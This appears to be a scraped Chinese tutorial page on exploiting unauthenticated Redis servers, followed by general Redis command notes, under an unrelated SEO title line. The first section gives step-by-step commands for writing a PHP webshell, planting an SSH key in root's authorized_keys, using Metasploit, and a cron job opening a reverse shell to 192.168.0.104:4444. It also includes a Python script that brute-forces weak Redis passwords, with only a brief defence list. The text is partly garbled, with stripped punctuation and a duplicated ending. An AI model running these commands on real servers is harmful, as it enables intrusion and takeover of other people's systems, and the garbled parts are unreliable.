织梦网站后台打不开,建设应用型网站的意义,湖北住房和城乡建设厅网站,wordpress网站服务器配置redis未授权漏洞
利用条件 版本比较高的redis需要修改redis的配置文件#xff0c;将bind前面#注释符去掉#xff0c;将protected-mode 后面改为no 写入webshell
config get dir #查看redis数据库路径
config set dir web路径# #修改靶机Redis数据库路径
config set dbfilen…redis未授权漏洞
利用条件 版本比较高的redis需要修改redis的配置文件将bind前面#注释符去掉将protected-mode 后面改为no 写入webshell
config get dir #查看redis数据库路径
config set dir web路径# #修改靶机Redis数据库路径
config set dbfilename shell.php #生成shell.php文件
set xxx \r\n\r\n?php phpinfo();?\r\n\r\n#将一句话木马写入文件中
#\r\n\r\n是换行的意思用redis写入文件会自带一些版本信息如果不换行可能导致无法执行。
set xxx \r\n\r\n?php eval($_POST[coleak]);?\r\n\r\n#上传木马可以通过蚁剑连接
save#保存ssh密钥连接
利用条件 1.当redis以root身份运行。 2.靶机redis链接未授权在攻击机上能用redis-cli连上 3.存在/root/.ssh目录如果不存在我们可以通过一句话木马连接蚁剑创建目录权限问题可能不成功。因为.ssh是隐藏目录可以通过ls -la查看有没有。 ssh-keygen -t rsa
将公钥id_rsa.pub里面内容复制到key.txt上传到靶机上面cat key.txt | redis-cli -h ip -x set xxx#如果是windows 将cat换成type
#将公钥作为value插入到数据库中
redis-cli -h 192.168.43.141
config get dir
config set dir /root/.ssh
config set dbfilename authorized_keys
save
ssh -i id_rsa rootipmsf利用
msfdb run#开启msf
search redis#查看有关redis的模块
use 5
show options
set RHOST 192.168.3.207 #设置靶机的ip
run利用crontab反弹shell
nc -lvnp 4444redis-cli -h 192.168.0.104
set xxx \n\n*/1 * * * * /bin/bash -i/dev/tcp/192.168.0.104/4444 01\n\n
config set dir /var/spool/cron
config set dbfilename root
save过一分钟左右就可以收到shell
python脚本检测未授权或弱口令
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC[redis,root,oracle,password,paaw0rd,abc123!,123456,admin]
def check(ip, port, timeout):try:socket.setdefaulttimeout(timeout)s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))s.send(INFO\r\n)result s.recv(1024)if redis_version in result:return u未授权访问elif Authentication in result:for pass_ in PASSWORD_DIC:s socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))s.send(AUTH %s\r\n %(pass_))result s.recv(1024)if OK in result:return u存在弱口令密码%s % (pass_)except Exception, e:pass
if __name__ __main__:ipsys.argv[1]portsys.argv[2]print check(ip,port, timeout10)防御方法
1.绑定IP 把 #bind 127.0.0.1前面的注释#号去掉把127.0.0.1改成你允许访问你的redis服务器的ip地址
2.设置密码redis基础知识
安装配置
kaliubuntu安装redis
sudo apt-get update
sudo apt-get install redis-server启动 Redis
redis-server
使用配置文件启动
redis-server /etc/redis/redis.conf连接 redis
redis-cli
redis-cli -h 127.0.0.1 -p 6379
redis-cli -h host -p port -a password避免中文乱码
redis-cli --raw编辑配置 使用 CONFIG set 命令来修改配置 redis 127.0.0.1:6379 CONFIG SET loglevel notice
OKredis 127.0.0.1:6379 CONFIG GET loglevel
1) loglevel
2) noticeCONFIG GET *key命令
del 删除
dump 序列化给定 key 并返回被序列化的值。
exists 检查给定 key 是否存在
expire key seconds 为给定 key 设置过期时间以秒计
keys 正则匹配所有的key值
ttl 返回剩余存活时间 -1不过期-2已过期或不存在
randomkey 从当前数据库中随机返回一个 key 。
rename 重命名key
type 返回类型
flushall 删除所有的key
quit 退出
setex 设置包含过期时间的key数据类型 Redis支持五种数据类型string字符串hash哈希list列表set集合及zset(sorted set有序集合)。 字符串
getrange 返回 key 中字符串值的子字符
setnx 不存在时设置key值
strlen 返回字符串的长度列表
lpush 左插
rpush 右插
lrange start end 查看内容
lrange coleak 0 -1
lpop 左取出
rpop 右取出
l(r)pop key number 删除指定数量的内容
llen 返回长度
ltrim key start end 保留区间内的元素集合
sadd 集合添加元素
smembers 查看集合内元素
srem 删除集合中的元素有序集合
zadd key number value 根据nmum大小添加到有序集合
zrange key start end (withscores)按照顺序列举
zscore key value 查看number
zrank 查看排名(反序)
zrevrank 正序排名
zrem 删除某个内容哈希
hset person name coleak
hset person age 20
hget person age
hgetall person 返回所有键值对
hdel 删除键值对
hdel person age
hexists 判断键值对是否存在
hexists person age
hlen 键值对等数量
hlen person发布订阅模式
SUBSCRIBE coleak
PUBLISH coleak ccStream消息队列
xadd coleak * course math 这里*表示自动生成消息的id
xadd coleak * course english
xadd coleak * course cs
xlen coleak
xrange coleak - 查看coleak中所有消息
xdel coleak 1694008733008-0
xtrim coleak maxlen 0 删除所有消息xadd coleak 1-0 course git
xadd coleak 2-0 course docker
xadd coleak 3-0 course redis
xread streams coleak 0 从第0条开始读取消息
xread count 2 block 1000 streams coleak 0 读取两条若一条都无则堵塞一千毫秒xread count 5 block 10000 streams coleak $ 读取从此刻开始的最新消息
xadd coleak 1-0 course newbypassxgroup cokeak group1 0 消息名组名组id添加消费者组
xinfo groups coleak
xgroup createconsumer coleak group1 con1
xgroup createconsumer coleak group1 con2
xgroup createconsumer coleak group1 con3
xreadgroup group group1 con1 count 2 block 3000 streams coleak 地理位置
geoadd添加地理位置的坐标。
geopos获取地理位置的坐标。
geodist计算两个位置之间的距离。
georadius根据用户给定的经纬度坐标来获取指定范围内的地理位置集合。
georadiusbymember根据储存在位置集合里面的某个地点获取指定范围内的地理位置集合。
geohash返回一个或多个位置对象的 geohash 值。HyperLogLog
pfadd course1 git docker redis
pfcount course1
pfadd course2 python java redis docker
pfcount course2
pfmerge course course1 course2
pfcount course 返回为5bitmap
set dianzan \xf0 11110000
getbit dianzan 0 0
getbit dianzan 3 1
bitcount dianzan 统计为1的数量
bitpos dianzan 0 返回第一个出现0的位置事务
MULTI
set k1 v1
set k2 v2
EXECDISCARD
取消事务放弃执行事务块内的所有命令。持久化
sudo vim /etc/redis/redis.conf
save 3600 1 自动触发快照save 手动快照
xxd dump.rdb
bgsave 子进程进行保存不影响当下数据的处理CONFIG GET dir 查看保存的路径AOF 保存执行的所有操作并在下次打开时重新执行以复原数据库
appendonly yesdbfilename文件保存的路径密码设置
CONFIG set requirepass coleak 设置密码
CONFIG get requirepass
AUTH PASSWORD 登陆时密码匹配时返回 OK 否则返回一个错误
弃执行事务块内的所有命令。持久化
sudo vim /etc/redis/redis.conf
save 3600 1 自动触发快照save 手动快照
xxd dump.rdb
bgsave 子进程进行保存不影响当下数据的处理CONFIG GET dir 查看保存的路径AOF 保存执行的所有操作并在下次打开时重新执行以复原数据库
appendonly yesdbfilename文件保存的路径密码设置
CONFIG set requirepass coleak 设置密码
CONFIG get requirepass
AUTH PASSWORD 登陆时密码匹配时返回 OK 否则返回一个错误
